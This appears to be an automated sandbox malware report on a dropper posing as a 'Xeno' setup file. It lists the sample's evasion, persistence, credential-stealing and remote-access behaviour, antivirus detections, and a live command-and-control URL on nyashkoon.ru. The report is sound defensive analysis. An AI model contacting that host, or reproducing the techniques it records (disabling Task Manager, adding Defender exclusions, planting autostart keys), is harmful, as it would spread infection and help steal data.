                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformationJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeQueries volume information: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe VolumeInformation
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeQueries volume information: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe VolumeInformation
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeQueries volume information: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe VolumeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeQueries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,6_2_00FFDF1E
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FEB146 GetVersionExW,6_2_00FEB146
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                      Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
                      Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.3090884255.000000001B5A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.13c238a0.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.13beaed8.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 1864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: NZdXlPbVdUubKXQ.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 5692, type: MEMORYSTR
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.13c238a0.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.13beaed8.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 1864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: NZdXlPbVdUubKXQ.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 5692, type: MEMORYSTR
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information11
                      Scripting
                      Valid Accounts241
                      Windows Management Instrumentation
                      11
                      Scripting
                      1
                      DLL Side-Loading
                      31
                      Disable or Modify Tools
                      OS Credential Dumping1
                      System Time Discovery
                      1
                      Taint Shared Content
                      1
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory3
                      File and Directory Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts13
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      Security Account Manager57
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job
                      41
                      Registry Run Keys / Startup Folder
                      41
                      Registry Run Keys / Startup Folder
                      2
                      Software Packing
                      NTDS261
                      Security Software Discovery
                      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      PowerShell
                      Network Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion
                      Cached Domain Credentials151
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Modify Registry
                      Proc Filesystem1
                      Remote System Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      System Network Configuration Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                      Process Injection
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590013 Sample: XenoSetup(2).exe.bin.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 124 804052cm.nyashkoon.ru 2->124 126 Found malware configuration 2->126 128 Antivirus detection for URL or domain 2->128 130 Antivirus detection for dropped file 2->130 132 17 other signatures 2->132 12 XenoSetup(2).exe.bin.exe 1 4 2->12         started        16 XenoSetup(1).exe 3 2->16         started        18 XenoSetup(1).exe 2->18         started        20 4 other processes 2->20 signatures3 process4 file5 110 C:\Users\user\AppData\...\XenoSetup(1).exe, PE32 12->110 dropped 112 C:\Users\user\AppData\Local\Temp\Xeno.exe, PE32+ 12->112 dropped 114 C:\Users\...\XenoSetup(2).exe.bin.exe.log, CSV 12->114 dropped 150 Creates autostart registry keys with suspicious names 12->150 152 Creates multiple autostart registry keys 12->152 154 Bypasses PowerShell execution policy 12->154 156 Adds a directory exclusion to Windows Defender 12->156 22 XenoSetup(1).exe 3 6 12->22         started        26 NZdXlPbVdUubKXQ.exe 12->26         started        28 powershell.exe 23 12->28         started        30 Xeno.exe 12->30         started        32 wscript.exe 16->32         started        34 wscript.exe 18->34         started        158 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->158 signatures6 process7 file8 96 C:\portBrokerDll\DriverbrokerCrtDhcp.exe, MS-DOS 22->96 dropped 144 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->144 146 Machine Learning detection for dropped file 22->146 36 wscript.exe 1 22->36         started        98 C:\Users\user\Desktop\xvoKkvvU.log, PE32 26->98 dropped 100 C:\Users\user\Desktop\vcvJAqxW.log, PE32 26->100 dropped 102 C:\Users\user\Desktop\uOpJsBHp.log, PE32 26->102 dropped 104 21 other malicious files 26->104 dropped 148 Loading BitLocker PowerShell Module 28->148 39 conhost.exe 28->39         started        41 cmd.exe 32->41         started        43 cmd.exe 34->43         started        signatures9 process10 signatures11 134 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->134 45 cmd.exe 1 36->45         started        136 Uses cmd line tools excessively to alter registry or file data 41->136 48 conhost.exe 41->48         started        50 reg.exe 41->50         started        52 DriverbrokerCrtDhcp.exe 41->52         started        54 conhost.exe 43->54         started        56 reg.exe 43->56         started        58 DriverbrokerCrtDhcp.exe 43->58         started        process12 signatures13 160 Uses cmd line tools excessively to alter registry or file data 45->160 60 DriverbrokerCrtDhcp.exe 7 52 45->60         started        64 reg.exe 1 1 45->64         started        66 conhost.exe 45->66         started        process14 file15 116 C:\Windows\...116ZdXlPbVdUubKXQ.exe, MS-DOS 60->116 dropped 118 C:\Users\user\Desktop\vMsrqipz.log, PE32 60->118 dropped 120 C:\Users\user\Desktop\tBjJkMRH.log, PE32 60->120 dropped 122 25 other malicious files 60->122 dropped 162 Creates an undocumented autostart registry key 60->162 164 Creates multiple autostart registry keys 60->164 166 Creates an autostart registry key pointing to binary in C:\Windows 60->166 172 2 other signatures 60->172 68 cmd.exe 60->68         started        71 csc.exe 60->71         started        74 csc.exe 60->74         started        76 7 other processes 60->76 168 Disable Task Manager(disabletaskmgr) 64->168 170 Disables the Windows task manager (taskmgr) 64->170 signatures16 process17 file18 138 Uses ping.exe to sleep 68->138 140 Uses ping.exe to check the status of other devices and networks 68->140 78 conhost.exe 68->78         started        80 chcp.com 68->80         started        94 2 other processes 68->94 106 C:\Program Files (x86)\...\msedge.exe, PE32 71->106 dropped 142 Infects executable files (exe, dll, sys, html) 71->142 82 conhost.exe 71->82         started        84 cvtres.exe 71->84         started        108 C:\Windows\...\SecurityHealthSystray.exe, PE32 74->108 dropped 86 conhost.exe 74->86         started        88 cvtres.exe 74->88         started        90 conhost.exe 76->90         started        92 cvtres.exe 76->92         started        signatures19 process20

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      XenoSetup(2).exe.bin.exe55%ReversingLabsByteCode-MSIL.Trojan.Cassiopeia
                      XenoSetup(2).exe.bin.exe100%AviraTR/Dropper.Gen
                      XenoSetup(2).exe.bin.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\Desktop\GyShWgyC.log100%AviraHEUR/AGEN.1362695
                      C:\Users\user\Desktop\IlCyhHua.log100%AviraHEUR/AGEN.1300079
                      C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat100%AviraBAT/Delbat.C
                      C:\Users\user\Desktop\BFVQSOun.log100%AviraTR/Agent.jbwuj
                      C:\Users\user\Desktop\ESyrPCdJ.log100%AviraTR/Agent.jbwuj
                      C:\Users\user\Desktop\ItmQLqVf.log100%AviraTR/AVI.Agent.updqb
                      C:\Users\user\Desktop\Aqnqislq.log100%AviraTR/PSW.Agent.qngqt
                      C:\Users\user\Desktop\ARRIhAyp.log100%AviraHEUR/AGEN.1300079
                      C:\Users\user\Desktop\GyShWgyC.log100%Joe Sandbox ML
                      C:\Users\user\Desktop\GGCzAPYH.log100%Joe Sandbox ML
                      C:\Users\user\Desktop\IlCyhHua.log100%Joe Sandbox ML
                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                      C:\Users\user\Desktop\Aqnqislq.log100%Joe Sandbox ML
                      C:\Users\user\Desktop\ARRIhAyp.log100%Joe Sandbox ML
                      C:\Users\user\Desktop\FSpHSmDL.log100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe100%Joe Sandbox ML
                      C:\Users\user\Desktop\ARRIhAyp.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\Aqnqislq.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\BFVQSOun.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\BOtQCANk.log29%ReversingLabs
                      C:\Users\user\Desktop\BcHAIFcQ.log8%ReversingLabs
                      C:\Users\user\Desktop\ESyrPCdJ.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\FSpHSmDL.log8%ReversingLabs
                      C:\Users\user\Desktop\GGCzAPYH.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\GpvhmufF.log9%ReversingLabs
                      C:\Users\user\Desktop\GyShWgyC.log17%ReversingLabs
                      C:\Users\user\Desktop\IlCyhHua.log17%ReversingLabs
                      C:\Users\user\Desktop\ItmQLqVf.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\KZGGSUqY.log25%ReversingLabs
                      C:\Users\user\Desktop\LuUydMov.log5%ReversingLabs
                      C:\Users\user\Desktop\LxMgmcSS.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\MPdHuBxA.log25%ReversingLabs
                      C:\Users\user\Desktop\NZUxJEKO.log5%ReversingLabs
                      C:\Users\user\Desktop\NoWOUMSl.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\NpzpwslB.log25%ReversingLabs
                      C:\Users\user\Desktop\PIQPERQj.log8%ReversingLabs
                      C:\Users\user\Desktop\RPLnQAKH.log4%ReversingLabs
                      C:\Users\user\Desktop\TZhoQTpI.log3%ReversingLabs
                      C:\Users\user\Desktop\UWIwmTED.log8%ReversingLabs
                      C:\Users\user\Desktop\UfDWuYEk.log12%ReversingLabs
                      C:\Users\user\Desktop\WKMEYgAB.log25%ReversingLabs
                      C:\Users\user\Desktop\XOSeUCEW.log17%ReversingLabs
                      C:\Users\user\Desktop\ZSKNtyuw.log25%ReversingLabs
                      C:\Users\user\Desktop\ZTxvzCno.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                      C:\Users\user\Desktop\bGOWfMqu.log12%ReversingLabs
                      C:\Users\user\Desktop\dQveIBvX.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\eDXMSiYF.log8%ReversingLabs
                      C:\Users\user\Desktop\eLGexRyL.log25%ReversingLabs
                      C:\Users\user\Desktop\frbUEvTD.log4%ReversingLabs
                      C:\Users\user\Desktop\gQJUAkON.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\jCRLjesV.log8%ReversingLabs
                      C:\Users\user\Desktop\kEjDZxDz.log21%ReversingLabs
                      C:\Users\user\Desktop\ldZbGFkR.log17%ReversingLabs
                      C:\Users\user\Desktop\lmJukoKX.log9%ReversingLabs
                      C:\Users\user\Desktop\ogLKbooN.log8%ReversingLabs
                      C:\Users\user\Desktop\paukoYZl.log3%ReversingLabs
                      C:\Users\user\Desktop\pczkrlLQ.log8%ReversingLabs
                      C:\Users\user\Desktop\qodKYthi.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\remTNUPL.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\tBjJkMRH.log21%ReversingLabs
                      C:\Users\user\Desktop\uOpJsBHp.log21%ReversingLabs
                      C:\Users\user\Desktop\vMsrqipz.log21%ReversingLabs
                      C:\Users\user\Desktop\vcvJAqxW.log29%ReversingLabs
                      C:\Users\user\Desktop\xvoKkvvU.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://804052cm.nyashkoon.ru/imagelineGeoTest.php100%Avira URL Cloudmalware
                      http://804052cm.nyashkoon.ru100%Avira URL Cloudmalware
                      http://804052cm.nyashkoon.ru/100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      804052cm.nyashkoon.ru
                      unknown
                      unknowntrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://804052cm.nyashkoon.ru/imagelineGeoTest.phpNZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://crl.mpowershell.exe, 00000002.00000002.2325222503.000001A1F8E66000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/dotnet/app-launch-failedWouldXeno.exefalse
                                    high
                                    https://github.com/Riz-ve/Xeno.Xeno.exe, 00000007.00000000.2346254020.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drfalse
                                      high
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://aka.ms/dotnet-core-applaunch?Architecture:XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Riz-ve/XenoXeno.exefalse
                                                    high
                                                    http://804052cm.nyashkoon.ru/NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://aka.ms/dotnet/app-launch-failedXeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drfalse
                                                      high
                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://804052cm.nyashkoon.ruNZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmp, DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp, NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/dotnet-core-applaunch?XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drfalse
                                                              high
                                                              https://aka.ms/dotnet/app-launch-failedDownloadXeno.exefalse
                                                                high
                                                                No contacted IP infos
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1590013
                                                                Start date and time:2025-01-13 13:31:14 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 37s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:53
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:XenoSetup(2).exe.bin.exe
                                                                Detection:MAL
                                                                Classification:mal100.spre.troj.expl.evad.winEXE@75/85@5/0
                                                                EGA Information:
                                                                • Successful, ratio: 15.4%
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 1864 because it is empty
                                                                • Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 2528 because it is empty
                                                                • Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 4372 because it is empty
                                                                • Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 5376 because it is empty
                                                                • Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 5692 because it is empty
                                                                • Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 6952 because it is empty
                                                                • Execution Graph export aborted for target NZdXlPbVdUubKXQ.exe, PID 1476 because it is empty
                                                                • Execution Graph export aborted for target NZdXlPbVdUubKXQ.exe, PID 1912 because it is empty
                                                                • Execution Graph export aborted for target NZdXlPbVdUubKXQ.exe, PID 3184 because it is empty
                                                                • Execution Graph export aborted for target XenoSetup(2).exe.bin.exe, PID 876 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 6400 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                TimeTypeDescription
                                                                07:32:18API Interceptor18x Sleep call for process: powershell.exe modified
